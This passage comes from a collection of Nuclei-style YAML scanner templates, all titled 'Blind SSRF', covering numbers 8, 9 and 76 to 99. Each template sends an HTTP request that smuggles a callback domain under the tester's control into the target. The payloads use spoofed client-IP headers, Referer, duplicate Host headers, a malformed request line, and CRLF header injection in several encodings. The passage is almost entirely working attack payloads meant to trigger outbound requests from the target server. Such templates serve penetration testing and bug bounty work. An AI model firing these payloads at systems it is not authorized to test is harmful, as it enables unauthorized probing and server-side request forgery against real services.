        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-76.yaml:
--------------------------------------------------------------------------------
id: 0x076

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        True-Client-Ip: {{Host}}.{{Port}}.BSSRF-076.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-77.yaml:
--------------------------------------------------------------------------------
id: 0x077

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Real-IP: {{Host}}.{{Port}}.BSSRF-077.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-78.yaml:
--------------------------------------------------------------------------------
id: 0x078

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Originating-IP: {{Host}}.{{Port}}.BSSRF-078.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-79.yaml:
--------------------------------------------------------------------------------
id: 0x079

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Ali-CDN-Real-IP: {{Host}}.{{Port}}.BSSRF-079.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-8.yaml:
--------------------------------------------------------------------------------
id: 0x008

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET :@{{Host}}.{{Port}}.BSSRF-008.{{MY-DOMAIN}}# HTTP/1.0
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
-------------------------------------------------------------------------------- /Templates/BlindSSRF-80.yaml: -------------------------------------------------------------------------------- 1 | id: 0x080 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | Cdn-Src-Ip: {{Host}}.{{Port}}.BSSRF-080.{{MY-DOMAIN}}/.{{Hostname}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-81.yaml: -------------------------------------------------------------------------------- 1 | id: 0x081 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | Cdn-Real-Ip: {{Host}}.{{Port}}.BSSRF-081.{{MY-DOMAIN}}/.{{Hostname}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-82.yaml: -------------------------------------------------------------------------------- 1 | id: 0x082 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | CF-Connecting-IP: {{Host}}.{{Port}}.BSSRF-082.{{MY-DOMAIN}}/.{{Hostname}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 
19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-83.yaml: -------------------------------------------------------------------------------- 1 | id: 0x083 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | X-Host: {{Host}}.{{Port}}.BSSRF-083.{{MY-DOMAIN}}/.{{Hostname}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-84.yaml: -------------------------------------------------------------------------------- 1 | id: 0x084 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | X-Custom-IP-Authorization: {{Host}}.{{Port}}.BSSRF-084.{{MY-DOMAIN}}/.{{Hostname}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-85.yaml: -------------------------------------------------------------------------------- 1 | id: 0x085 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | Referer: {{Scheme}}://{{Host}}.{{Port}}.BSSRF-085.{{MY-DOMAIN}}/.{{Hostname}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 
Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-86.yaml: -------------------------------------------------------------------------------- 1 | id: 0x086 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%0d%0aHost:%20{{Host}}.{{Port}}.BSSRF-086.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-87.yaml: -------------------------------------------------------------------------------- 1 | id: 0x087 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%E5%98%8D%E5%98%8AHost:%20{{Host}}.{{Port}}.BSSRF-087.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-88.yaml: -------------------------------------------------------------------------------- 1 | id: 0x088 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET 
/%20HTTP/1.1%0DHost:%20{{Host}}.{{Port}}.BSSRF-088.{{MY-DOMAIN}}%0D%0D HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-89.yaml: -------------------------------------------------------------------------------- 1 | id: 0x089 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%0AHost:%20{{Host}}.{{Port}}.BSSRF-089.{{MY-DOMAIN}}%0A%0A HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-9.yaml: -------------------------------------------------------------------------------- 1 | id: 0x009 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | Host: {{Host}}.{{Port}}.BSSRF-009.{{MY-DOMAIN}} 14 | Cache-Control: no-transform 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | unsafe: true 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-90.yaml: -------------------------------------------------------------------------------- 1 | id: 0x090 2 | 3 | info: 4 | 
name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%3F%0DHost:%20{{Host}}.{{Port}}.BSSRF-090.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-91.yaml: -------------------------------------------------------------------------------- 1 | id: 0x091 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.10x0D0x0ADHost:%20{{Host}}.{{Port}}.BSSRF-091.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-92.yaml: -------------------------------------------------------------------------------- 1 | id: 0x092 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1\u560d\u560aHost:%20{{Host}}.{{Port}}.BSSRF-092.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" 
-------------------------------------------------------------------------------- /Templates/BlindSSRF-93.yaml: -------------------------------------------------------------------------------- 1 | id: 0x093 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%0d%0aX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-093.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-94.yaml: -------------------------------------------------------------------------------- 1 | id: 0x094 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%E5%98%8D%E5%98%8AX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-094.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-95.yaml: -------------------------------------------------------------------------------- 1 | id: 0x095 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%0DX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-095.{{MY-DOMAIN}}%0D%0D HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) 
Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-96.yaml: -------------------------------------------------------------------------------- 1 | id: 0x096 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%0AX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-096.{{MY-DOMAIN}}%0A%0A HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-97.yaml: -------------------------------------------------------------------------------- 1 | id: 0x097 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1%3F%0DX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-097.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-98.yaml: -------------------------------------------------------------------------------- 1 | id: 0x098 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET 
/%20HTTP/1.10x0D0x0ADX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-098.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-99.yaml: -------------------------------------------------------------------------------- 1 | id: 0x099 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET /%20HTTP/1.1\u560d\u560aX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-099.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Cache-Control: no-transform 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" --------------------------------------------------------------------------------